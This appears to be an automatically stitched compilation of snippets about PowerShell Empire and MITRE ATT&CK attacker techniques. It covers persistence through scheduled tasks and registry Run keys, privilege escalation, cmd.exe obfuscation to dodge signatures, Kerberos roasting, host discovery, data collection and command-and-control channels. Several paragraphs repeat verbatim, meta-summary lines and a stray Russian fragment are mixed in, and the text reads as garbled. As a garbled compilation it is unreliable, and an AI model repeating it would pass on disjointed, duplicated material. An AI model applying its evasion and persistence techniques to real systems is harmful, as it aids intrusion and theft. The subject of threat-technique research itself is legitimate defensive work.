Empire

The content repeatedly states that threat actors 'obtained,' 'acquired,' or 'used' publicly available, open-source, legitimate, or modified tools such as Mimikatz, Cobalt Strike, PsExec, Empire, Impacket, and many others.

Windows operating systems provide a utility (schtasks.exe) which enables system administrators to execute a program or a script at a specific given date and time. This kind of behavior has been heavily abused by threat actors and red teams as a persistence mechanism.

References https://attack.mitre.org/techniques/T1053/ ... The persistence technique of scheduled tasks can be implemented both manually and automatically.

If you want to use the script in PowerShell Empire, then you can run it on the agent by switching to the command line (shell) mode.

Although it is categorized as an Execution technique in the MITRE ATT&CK framework, the T1059.001 PowerShell technique can be used for Defense Evasion. Attackers use PowerShell to: bypassing Antimalware Scan Interface (AMSI) disabling Script Block Logging to prevent detection disabling Windows Defender downloading and running malware payloads in memory executing sophisticated codes without installing extra software injecting malicious code into legitimate processes manipulating access tokens

AppleScript offers offensive actors a plethora of ways to execute. In addition to simply executing a .scrpt file, you can run AppleScripts from Mail rules, from a shell script, in memory, from the command line, from within a MachO, in a plain text, uncompiled file, from an Automator workflow, from a Folder Action, a Finder Service or from a Calendar event.

Prompted by this discovery, the author began researching obfuscation techniques supported by cmd.exe... The goal of this research is to enumerate the problem space of cmd.exe-supported obfuscation techniques...

They also replaced the ImagePath registry value of a Windows service with a new backdoor binary.

Windows operating systems provide a utility (schtasks.exe) which enables system administrators to execute a program or a script at a specific given date and time. This kind of behavior has been heavily abused by threat actors and red teams as a persistence mechanism.

References https://attack.mitre.org/techniques/T1053/ ... The persistence technique of scheduled tasks can be implemented both manually and automatically.

Across the content, malware repeatedly 'adds Registry Run keys', 'creates Registry entries', 'modifies the Windows Registry', or 'overwrites registry keys' to maintain persistence.

Both tools first attempt to use “named pipe impersonation” to achieve SYSTEM privileges. This involves creating a Windows Service to execute as NT AUTHORITY\SYSTEM and feeding data to it through a named pipe that is randomly created by the malicious payload.

The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.

Windows operating systems provide a utility (schtasks.exe) which enables system administrators to execute a program or a script at a specific given date and time. This kind of behavior has been heavily abused by threat actors and red teams as a persistence mechanism.

References https://attack.mitre.org/techniques/T1053/ ... The persistence technique of scheduled tasks can be implemented both manually and automatically.

Both tools first attempt to use “named pipe impersonation” to achieve SYSTEM privileges. This involves creating a Windows Service to execute as NT AUTHORITY\SYSTEM and feeding data to it through a named pipe that is randomly created by the malicious payload.

Both tools first attempt to use “named pipe impersonation” to achieve SYSTEM privileges. This involves creating a Windows Service to execute as NT AUTHORITY\SYSTEM and feeding data to it through a named pipe that is randomly created by the malicious payload.

The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.

Skilled attackers continually seek out new attack vectors while employing evasion techniques to maintain the effectiveness of old vectors in an ever-changing defensive landscape... numerous threat actors employ obfuscation frameworks... In June 2017, the Advanced Practices Team identified FIN7 ... testing a novel obfuscation technique native to cmd.exe.

APT28 has performed timestomping on victim files. APT29 has used timestomping to alter the Standard Information timestamps on their web shells to match other files in the same directory. APT32 has used scheduled task raw XML with a backdated timestamp... APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.

Both tools first attempt to use “named pipe impersonation” to achieve SYSTEM privileges. This involves creating a Windows Service to execute as NT AUTHORITY\SYSTEM and feeding data to it through a named pipe that is randomly created by the malicious payload.

APT32 ... often downloads this second stage using the regsvr32.exe remote download technique known as “Squiblydoo”. To evade rigid signatures for this technique that rely on command line argument values /i:http:// or /i:https:// being present, APT32 first used cmd.exe’s escape character, the caret (^), and then in this later example used double quotes to break up these arguments.

They also replaced the ImagePath registry value of a Windows service with a new backdoor binary.

Across the content, malware repeatedly 'adds Registry Run keys', 'creates Registry entries', 'modifies the Windows Registry', or 'overwrites registry keys' to maintain persistence.

there are cases when we would like to fetch the user’s password, or their TGT (Ticket Granting Ticket) for Kerberos.

Kerberoasting TL;DR: Attackers request service tickets for accounts tied to high-privileged services. They then extract and crack these tickets offline to retrieve the plaintext password.

AS-REP Roasting Attack Explained - MITRE ATT&CK T1558.004 ... It exploits a vulnerability in Kerberos when the 'Do not require Kerberos preauthentication' setting is enabled. This vulnerability allows adversaries to extract user hashes, enabling them to decrypt passwords offline.

The content repeatedly describes malware and threat actors using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, nbtstat, netsh, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, domains, and network adapter/interface details.

The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.

Use in conjunction with other contextual indicators, for example detect Network discovery and Lateral movement attempts by unusual hassh such as those used by Paramiko, Powershell, Ruby, Meterpreter, Empire.

The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.

Empire can automatically gather the username, domain name, machine name, and other information from a compromised system... Operation Wocao, threat actors used a script to collect information about the infected system... RotaJakiro executes a set of commands to collect device information and sends the collected information to the C2 server.

The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").

AdFind can enumerate domain users. APT41 used built-in net commands to enumerate domain administrator users. BloodHound can collect information about domain users, including identification of domain admin accounts.

"CrackMapExec can execute PowerShell commands via WMI," "Empire also contains the ability to conduct PowerShell remoting with the Invoke-PSRemoting module," and "In the Triton Safety Instrumented System Attack, TEMP.Veles used a publicly available PowerShell-based tool, WMImplant."

Use in conjunction with other contextual indicators, for example detect Network discovery and Lateral movement attempts by unusual hassh such as those used by Paramiko, Powershell, Ruby, Meterpreter, Empire.

Agent Tesla can steal data from the victim’s clipboard. APT38 used a Trojan called KEYLIME to collect data from the clipboard. APT39 has used tools capable of stealing contents of the clipboard.

Agrius used a custom tool, sql.net4.exe, to query SQL databases and then identify and extract personally identifiable information... AppleSeed has automatically collected data from USB drives, keystrokes, and screen images before exfiltration... Ember Bear engages in mass collection from compromised systems during intrusions.

Agent Tesla can access the victim’s webcam and record video. AsyncRAT can record screen content on targeted systems. Bandook has modules that are capable of capturing video from a victim's webcam. ... ZxShell has a command to perform video device spying.

And if everything works well, we’ll get that beacon communicating to our front end servers.

The content repeatedly describes threat actors and malware using HTTP and HTTPS for command and control, such as: "Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests."

The adversaries had communicated to both Dropbox and Pastebin. APT28 has used Google Drive for C2. APT37 leverages social networking sites and cloud platforms (AOL, Twitter, Yandex, Mediafire, pCloud, Dropbox, and Box) for C2.

Если пользователь устанавливает такое «обновление», на устройство жертвы загружается малварь

...на устройство жертвы загружается малварь, а атакующие получают удаленный доступ к системе.

The content repeatedly describes malware and threat actors using SSL, TLS, HTTPS, RSA, AES, Blowfish, RC4, ECIES, Diffie-Hellman, OpenSSL, WolfSSL, and mutual TLS to protect command and control traffic.

ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.